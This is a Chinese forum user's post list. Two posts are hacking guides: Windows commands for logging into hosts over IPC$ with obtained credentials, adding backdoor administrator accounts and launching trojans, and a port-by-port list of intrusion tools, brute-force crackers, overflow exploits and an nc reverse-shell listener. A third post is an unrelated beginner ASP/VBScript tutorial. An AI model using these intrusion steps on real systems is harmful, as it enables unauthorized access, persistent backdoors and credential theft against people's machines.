微笑刺客521 微笑刺客521
关注数: 0 粉丝数: 1 发帖数: 130 关注贴吧数: 2
常用命令 一般黑客入侵所需要的几个常用命令1:NET 只要你拥有某IP的用户名和密码,那就用IPC$做连接吧! 这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1 net use \\127.0.0.1\ipc$ "123456" /user:"hbx" 退出的命令是 net use \\127.0.0.1\ipc$ /delte 下面的操作你必须登陆后才可以用.登陆的方法就在上面. 下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户. 我们加一个heibai的用户密码为lovechina net user heibai lovechina /add 只要显示命令成功,那么我们可以把他加入Administrator组了. net localgroup Administrators heibai /add 目录 一般黑客入侵所需要的几个常用命令1:NET 只要你拥有某IP的用户名和密码,那就用IPC$做连接吧! 2:at 一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢? 3:telnet 这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口. 4:FTP 它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个WWW.51.NET,不错的.当我们申请完后,它会给用户名,密码,以及FTP服务器. 5:copy 下面我说说怎样把本地的文件复制到对方硬盘上去,需要建立好IPC$连接才有效。 6:set 如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的80端口要开,不然你黑给谁看。这时需要用SET命令! 7:nbtstat 如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就要用这个命令得到用户了。8:Shutdown 关了对方的NT服务器的命令 9:DIR 这个命令没什么好讲,但是却非常重要,他是查看一目录里的所有文件、文件夹。 10:echo 著名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主机。 11:attrib 这个命令是设置文件属性的。12:del 当你看到这个标题可别倒下啊!
目前实用的几种入侵方法以及工具 工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。      1. 1433端口入侵   scanport.exe 查有1433的机器   SQLScanPass.exe 进行字典暴破(字典是关键)   最后 SQLTools.exe入侵   =============================   对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。   nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口   (以上反向的,测试成功)   sqlhelloz.exe 入侵ip 1433 (这个是正向连接)      2. 4899端口入侵   用4899过滤器.exe,扫描空口令的机器      3. 3899的入侵   对很早的机器,可以试试3389的溢出(win3389ex.exe)   对2000的机器,可以试试字典暴破。(tscrack.exe)      4. 80入侵   对sp3以前的机器,可以用webdav入侵;   对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)   可以利用SQL进行注入。(小榕的注入软件)。      5. serv-u入侵(21端口)   对5. 004及以下系统,可用溢出入侵。(serv5004.exe)   对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)   ======================================   对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)   输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A      6. 554端口   用real554.exe入侵。      7. 6129端口   用DameWare6129.exe入侵。      8. 系统漏洞   利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,   进行溢出入侵。      9. 3127等端口   可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。      10. 其他入侵   利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
ASP脚本基础 通过前两篇的学习,相信各位已经对 ASP 的动态网站设计有了一个基本的概念和整体的印象。从本篇开始作者将从脚本语言的使用着手,由浅入深地带领大家探索 ASP 动态网站设计的真正奥秘。  本文第二篇刊登后,很多朋友给我发了“妹儿”,希望能尽快看到本文的第三、第四、乃至第……篇,甚至有位朋友焦急地要我将 ASP 篇的全文发给他。看到有如此之多志同道合的朋友,令我精神大振。虽然 ASP 早在两年前就已经推出了,但直到今年它才以其灵活便捷的开发过程、良好的 WEB 数据库连接功能受到了国人的重视,然而由于目前国内尚缺乏关于 ASP 开发 WEB 应用程序的详尽教材,因此使得国内广大 WEB 开发者们仍处在闭门啃 E 文的阶段,也包括作者本人。也正因为如此,作者才蒙发了写文章的念头,在得到 Chinabyte 网络学院翁斌先生的大力支持后,各位才得以见到此文。  作者殷切希望能通过此文为广大 WEB 开发者和爱好者提供便利,使大家共同来参加 ASP 的学习和交流,为了顾全不同层次读者的需求作者还是决定从最基本的脚本语言的编制着手,随后再一步一步地讲解 ASP 内建对象、ActiveX 组件以及用 ASP 开发 WEB 应用程序的实例,相信通过一段时间持续的学习,不出几个月各位都能够得心应手地开发自己的动态网站。下面就先请大家跟我来学习一些 ASP 中应用脚本语言(以 VBScript 为主)的基础知识。  在开始学习脚本语言之前,你应该理解一些简单的概念 -- 变量、进程。所谓变量是计算机内存中已命名的存储位置,其中包含了数字或字符串等数据,它使用户便于理解脚本操作的名称,为用户提供了一种存储、检索和操作数据的途径。程序是由一个或多个进程组成的,在 VBScript 中,进程就是“指令块”,通常意义上的进程,如 Sub,只是为了简单的数据处理。   在 VBScript 中,严格的来讲变量是不用声明的,   如:< % Mystring="This is my string" % >   然而,即使在使用变量前不需要去声明变量,也应养成在编程时声明变量的良好习惯,因为这样有助于防止错误发生。声明一个变量意味着告诉脚本引擎,有一个特定名称的变量,这样就可以在脚本中引用该变量。在 VBScript 中声明一个变量可以使用“Dim”语句,如下:    < script language="VBScript" >    < !--    Option Explicit ' 要求在脚本中声明所有的变量    Dim Mystring    Mystring="This is my string"    -- >    < /script>  变量的作用域即生命期,决定哪些脚本命令可访问变量。在过程内部声明的变量具有局部作用域。每执行一次过程,变量就被创建然后消亡。而过程外部的任何命令都不能访问它。在过程外部声明的变量具有全局作用域,其值能被 ASP 页上的任何脚本命令访问和修改。声明变量时,局部变量和全局变量可以有相同的名称。而改变其中一个的值并不会改变另一个的值。如果没有声明变量,则可能不小心会改变一个全局变量的值。例如,以下脚本命令返回值 1,虽然有两个名为 Y 变量:    < %    Dim YY = 1Call SetLocalVariableResponse.Write Y    Sub SetLocalVariable    Dim Y    Y = 2End Sub % >  由于变量没有显式声明,以下的脚本命令将返回 2。当过程调用将 Y 设置为 2 时,脚本引擎认为该过程是要修改全局变量:    <%    Y = 1Call SetLocalVariableResponse.Write Y    Sub SetLocalVariable    Y = 2    End Sub% >  然而,全局变量仅在单个 ASP 页中可用,要使它在单个 ASP 页之外可用,就必须为变量赋予会话或应用程序作用域。会话作用域变量对一个用户所请求的 ASP 应用程序中的所有页都是可用的。应用程序作用域变量也如此。对单个用户来说,会话变量是存储信息的最佳途径,例如,用户首选项、用户名或用户的标识。对于一个特殊应用程序的所有用户,应用程序作用域是存储信息的最佳途径,例如,应用程序特定的问候语或应用程序所需的初始值。ASP 提供两个内建对象来让您存储变量:Session 对象和 Application 对象,这将在今后的 ASP 内建对象中着重讨论。
1 下一页